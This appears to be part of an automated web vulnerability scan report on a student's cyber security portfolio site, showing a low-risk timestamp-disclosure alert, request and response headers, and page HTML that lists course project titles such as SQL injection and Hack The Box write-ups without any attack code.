          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          166584919
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        5. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          16894306, which evaluates to: 1970-07-15 13:51:46

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
